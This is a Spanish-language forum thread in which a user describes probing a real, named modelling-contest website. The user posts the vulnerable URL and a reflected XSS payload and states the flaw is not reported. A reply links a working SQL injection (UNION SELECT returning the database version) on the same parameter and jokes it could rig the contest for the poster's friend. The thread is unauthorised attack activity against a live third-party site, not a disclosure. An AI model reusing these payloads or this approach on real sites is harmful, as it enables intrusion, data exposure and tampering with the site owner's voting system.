¡Hola! Una amiga me pidió que votara por ella en un concurso de modelaje. Luego de hacerle el favor, no podía dejar la web sin inyectar un simple script por curiosidad.
(http://i.imgur.com/sq6calV.jpg)
-URL: http://www.kattypulido.com/wp/detalles.php?campo_ID= (http://www.kattypulido.com/wp/detalles.php?campo_ID=)
-Vector: "><script>alert('xsS')</script> || http://www.kattypulido.com/wp/detalles.php?campo_ID="><script>alert('xsS')</script> (http://www.kattypulido.com/wp/detalles.php?campo_ID="><script>alert('xsS')</script>)
-Reportado: NO.
Quizas podas hacerla ganadora con esto: LINK (http://www.kattypulido.com/wp/detalles.php?campo_ID=1%27+union+select+1,2,@@version,4,5,6,7,8,9,10,11+--+) xDxD
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Quizas podas hacerla ganadora con esto: LINK (http://www.kattypulido.com/wp/detalles.php?campo_ID=1%27+union+select+1,2,@@version,4,5,6,7,8,9,10,11+--+) xDxD
jaja! Increíble. Algo me decía que también era vulnerable a sqli. Pero pensé "Hasta que no consiga tiempo para aprender sobre sql, nunca lo sabré" ;D